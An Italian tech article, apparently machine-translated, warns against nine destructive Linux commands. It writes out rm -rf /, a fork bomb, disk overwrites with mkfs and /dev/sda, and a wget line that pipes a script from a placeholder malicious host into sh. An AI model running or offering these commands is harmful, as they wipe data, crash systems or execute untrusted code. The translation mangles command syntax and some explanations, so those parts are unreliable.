Ecco 9 comandi Linux pericolosi che non dovresti mai eseguire su nessun computer

Questi 9 comandi Linux, se eseguiti, possono causare danni irreparabili a qualsiasi computer

La maggior parte dei comandi di Linux sono generalmente utili, ma non sono l’argomento caldo. Qui elenchiamo un totale di 9 comandi Linux che possono provocare il caos su qualsiasi computer che utilizzi e che possono causare molti problemi.

1. rm -rf

Il comando rm -rf / rimuove tutto, inclusi i file sul disco rigido e i file sui dispositivi multimediali rimovibili collegati.

2.: () {: |: &} ;:

: () {: |: &};: È anche conosciuto come Fork Bomb per chi ne ha una conoscenza precisa. È un attacco Denial of Service contro un sistema Linux e continua a ripetersi finché il sistema non si blocca.

3. comando> / dev / sda

Questo comando Linux scrive dati grezzi e tutti i file nel blocco verranno sostituiti con dati grezzi, con conseguente perdita totale di dati in quel blocco.

4. directory mv / dev / null

Questo comando invia tutti i tuoi file personali a un buco nero, il che significa che li perderai per sempre.

5. wget http: // maligno_source -O | sh

La riga sopra scarica uno script dal web e lo invia a sh, che esegue il contenuto dello script. È sempre pericoloso eseguire script non attendibili, quindi evitalo a tutti i costi.

6. Mkfs.ext3 / dev / sda

Questo lascerà il disco rigido senza dati recuperabili, lasciando così il tuo sistema in una fase irrecuperabile.

7.> File

Questo comando viene utilizzato per liberare il contenuto del file. Se il comando sopra viene eseguito con un errore di scrittura o ignoranza come ‘> xt.conf’ scriverà il file di configurazione o qualsiasi altro file di sistema o di configurazione.

leggere  Gli utenti Apple stanno restituendo i loro nuovi MacBook Pro a causa di problemi di riscaldamento

8. ^ pippo ^ bar

Non è dannoso come gli altri, ma questo comando viene utilizzato per modificare il precedente comando di esecuzione senza la necessità di ridigitare l’intero comando. Nella situazione sbagliata, può diventare estremamente dannoso se non si rischia di ricontrollare la modifica nel comando originale usando il comando ^ pippo ^ bar.

9. Pompa di decompressione

Quando ti viene chiesto di aprire un file composto, il contenuto del file contiene dati altamente compressi. Una volta decompresso il file, vengono estratti centinaia di GB di dati che possono riempire il disco rigido per ridurre le prestazioni del sistema, quindi evitalo in ogni caso.

Ora che hai familiarità con gli ultimi comandi di Linux, farai bene a evitarli.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *